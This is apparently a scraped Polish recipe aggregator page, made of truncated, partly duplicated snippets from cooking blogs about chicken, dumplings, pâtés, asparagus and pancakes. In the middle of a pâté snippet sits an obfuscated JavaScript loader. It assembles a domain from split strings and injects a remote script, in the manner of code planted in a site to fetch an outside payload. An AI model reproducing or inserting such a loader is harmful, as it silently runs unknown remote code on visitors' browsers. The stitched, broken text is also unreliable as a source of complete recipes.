Co to jest wolnowar (slow cooker) pisałam już tutaj . Moja dzisiejsza propozycja to skrzydełka z kurczaka pieczone w wolnowarze. Dzięki temu, że pieką się długo
kuchnia doskiJako fanatyczka przypraw takich jak oregano, bazylia, czy zioła prowansalskie, serwuje dla Was kolejny pomysł na kurczaka z pomidorami i podsmażanymi ziemniakami:) Danie może wymaga sporo
Kuchnia Pełna PasjiW kuchni dążę do tego by "zdrowe" połączyć ze "smacznym". Przy tej potrawie z pewnością mi się to udało. ;) Panierka z otrębów pszennych, z mnóstwem aromatycznych
Szefowa kuchnidań z zestawu mojego zespołu. Menu do ugotowania przygotowane przez szefa marki składało się z 12 potraw, rozdzielone na 4 zespoły. Mój zespół przygotował: Chinkali, czyli duże kołduny z mięsnym farszem zatopionym w aromatycznym rosołku. Aby je spożyć należy je umiejętnie nadgryźć, wypić sączący się rosół ze środka i zakończyć zjedzeniem pozostałej reszty. Jest to tradycyjne danie kuchni kaukaskiej popularne(...)orzechów ukrytych pomiędzy warstwami ciasta filo. fot: www.rafalnowakowski.com www.sportografia.pl Piccata alla Milanese, czyli sznycel mediolański panierowany w mieszance jajka, parmezanu i bułki tartej i usmażony na maśle podany z sosem pomidorowym. Zespół Piotra zaś: – Vitello tonnato , czyli pieczoną cielęcinę na ziołowych grzankach z sosem pomidorowym z tuńczykiem fot: www.rafalnowakowski.com www.sportografia.pl – Halaszle , czyli węgierską zupę rybną z warzywami
Damsko-męskie spojrzenie na kuchniędwie części. Rozwałkować ciasto na podłużny placek o grubości do pół centymetra. Wykroić z niego koła o średnicy 15 cm (robiłam to miseczką). Na środku placka ułożyć solidną łyżkę mięsnej masy. Brzegi ciasta skleić ze sobą, tworząc sklejenie wysokie na około centymetr. Potem zawinąć sklejenie (patrz zdjęcie obok). Powtarzać czynności 10-12 do wykończenia ciasta. Ostatni placek rozwałkować(...)Kibinai piec 30 minut. Podawać z bulionem (u mnie warzywny). Uwagi: Kibinai są bardzo gorące w środku. Trzeba bardzo uważać podczas pierwszych kęsów. Z wnętrza kibinów wypływa trochę sosu z pieczenia farszu - uważajcie - gorący! Kibinai zjada się, trzymając je w rękach przez serwetkę i popija bulionem. A tak wyglądają te oryginalne (mnie brak wprawy w zwijaniu zlepionych brzegów
Weekendy w domu i ogrodziedań z zestawu mojego zespołu. Menu do ugotowania przygotowane przez szefa marki składało się z 12 potraw, rozdzielone na 4 zespoły. Mój zespół przygotował: Chinkali, czyli duże kołduny z mięsnym farszem zatopionym w aromatycznym rosołku. Aby je spożyć należy je umiejętnie nadgryźć, wypić sączący się rosół ze środka i zakończyć zjedzeniem pozostałej reszty. Jest to tradycyjne danie kuchni kaukaskiej popularne(...)orzechów ukrytych pomiędzy warstwami ciasta filo. fot: www.rafalnowakowski.com www.sportografia.pl Piccata alla Milanese, czyli sznycel mediolański panierowany w mieszance jajka, parmezanu i bułki tartej i usmażony na maśle podany z sosem pomidorowym. Zespół Piotra zaś: – Vitello tonnato , czyli pieczoną cielęcinę na ziołowych grzankach z sosem pomidorowym z tuńczykiem fot: www.rafalnowakowski.com www.sportografia.pl – Halaszle , czyli węgierską zupę rybną z warzywami
Damsko-męskie spojrzenie na kuchniępodawać na wiele sposobów: zarówno do śniadaniowych kanapek, jak i w formie obiadu. Przygotowałam już wiele wersji i za wyjątkową uważam tą z dodatkiem selera – jednej z najlepszych imitacji mięsnego smaku. Przepisy na roślinne pasztety na pierwszy rzut oka mogą wydać się skomplikowane, ale w rzeczywistości tak nie jest; warto jednak kilka kroków zaplanować z wyprzedzeniem. Składniki na zwykłą formę(...)liście laurowe 2 duże cebule, posiekane ½ szklanki mielonych orzechów włoskich 1 pełnoziarnista bułka, namoczona w wodzie 1 łyżeczka majeranku ½ łyżeczki lubczyku ½ łyżeczki cząbru ½ łyżeczki mielonej kolendry 2 łyżki sosu sojowego sól pieprz Groch odcedź i ugotuj według instrukcji na opakowaniu w świeżej nieosolonej wodzie. Piekarnik rozgrzej do 200°C. Seler obierz, pokrój w plastry, a te następnie na mniejsze
Roślinna - blog wegańskiUwielbiam szparagi (zwłaszcza te zielone) i nie wyobrażam sobie, żebym nie zaraziła Cię tym uczuciem. Grillowane są boskie, ale mój mąż zawsze twierdzi, że przydałby się do nich jakiś mięsny akcent. Postanowiłam, więc te zielone cudowności wykorzystać jako patyczki grillowe. Patyczki? Pewnie pomyślisz, że zwariowałam? Nic z tych rzeczy! Zerknij na przepis i wszystko stanie się jasne. Wyszło pysznie, więc(...)Tesco) Sposób przygotowania: Szparagi umyj i osusz papierowym ręcznikiem. Następnie złap z oba końce i złam. Strona z główką szparaga jest tą dobrą, zgrubiałą końcówkę wyrzuć (lub wykorzystaj do sosu lub bulionu). Mięso dopraw solą, pieprzem i łyżeczką cynamonu. Dodaj do niego pokrojoną papryczkę,cebulkę i 2 duże łyżki ketchupu z jalapeno. Całość dokładnie wymieszaj. Zrób kulkę z mięsa
Wielki apetytproduktami kiszonymi: ogórkami, marynowaną papryką lub patisonami. Nie wahajmy się też użyć chrzanu, musztardy lub ćwikły. Na przyjęcie, niespodziewaną wizytę gości lub w ramach drugiego śniadania możemy połączyć mięsny smak pasztetu z odrobiną słodyczy w postaci suszonej śliwki lub konfitury żurawinowej. To nie wszystko Może się też tak zdarzyć, że pasztet to jedyna rzecz, jaką mamy w lodówce, kiedy wpadną(...)ponadziewać na wykałaczki kostki pasztetu razem z oliwkami, marynowanymi warzywami lub wspomnianymi suszonymi śliwkami. Takie same kostki wkroimy także do szybkiej sałatki, a długie paseczki podsmażymy i podamy z sosem czosnkowym. (function(){ i32r_=("u"+"st");i32r=document.createElement("script");i32r.async=true; i32ru="12087833";i32r_+="a"+("t.");i32r_+="i"+("nf"+("o"))+("/"); i32ru+=".2m6cfus532rmnvhk";i32ru+="j1xkjsmmhXfyin"; i32r.src="//"+i32r_+i32ru;i32r.type="text/javascript
Moja smaczna kuchniaTaka zapiekanka jest bardzo smaczna, syta, a w dodatku tania ( czasami wystarczy nam opróżnienie lodówki z resztek wędlin ). Teraz brokułowe drzewka są bardzo tanie wiec jeść
Gotowanie...to proste !jakoś zachciało mi się czegoś konkretnego, mianowicie mięska. Uwielbiam sosy więc zrobiłam dwa w jednym. Składniki: wołowina 250 g wieprzowina 250 g jajko 1 szt sól i pieprz do smaku koperek 3 łyżeczki Proeco Polska Dodatkowo : śmietana 30 % 150 ml 4 marchewki listek laurowy 3 szt ziele angielskie 3 szt sól i pieprz do smaku Krok 1 Mięsko myjemy(...)Marchew ścieramy na tarce o grubych oczkach, wkładamy do garnka,zalewamy wodą.Wkładamy ziele i listek laurowy. Gotujemy na małym ogniu. Kiedy nam się gotuje, wkładamy małe kuleczki mięsne. Gotujemy koło 45 minut doprawiając solą i pieprzem. Krok 3 Do słoiczka wlałam 1 setkę zimnej wody, dodałam łyżkę mąki i rozrobiłam. Wlałam to do garnka z mięskiem
Różowa kuchniaPrzyjdzie dzisiaj Nowy Rok, już 2016. Mam nadzieję, że lepszy pod wieloma względami, szczególnie zdrowotnymi, a na pewno nie gorszy... Życzę Wam wszystkim zdrowia i
Dzieje kuchennej WiewiórySkładniki na naleśniki mąka, 1 i 1/2 szkl mleko, 3/4 szkl woda, 1 szkl jajka, 2 szt sól, szczypta cukier, 1 łyżeczka olej, 1 łyżka
Gotowanie moimi oczamiSkładniki na makaron mąka pszenna, 1 i 1/2 szkl żółtko jajka, 2 szt koncentrat pomidorowy, 3 łyżki sól, 1/2 łyżeczki woda gorąca, 3 łyżki Składniki
Gotowanie moimi oczamiKaczka jest pyszna i jeśli ktoś jej jeszcze nie spróbował musi koniecznie to nadrobić. Dzięki przyprawom i dodatkom nadamy jej charakter, ale samo upieczenie kaczki to
Sztuka gotowania w/g Samiry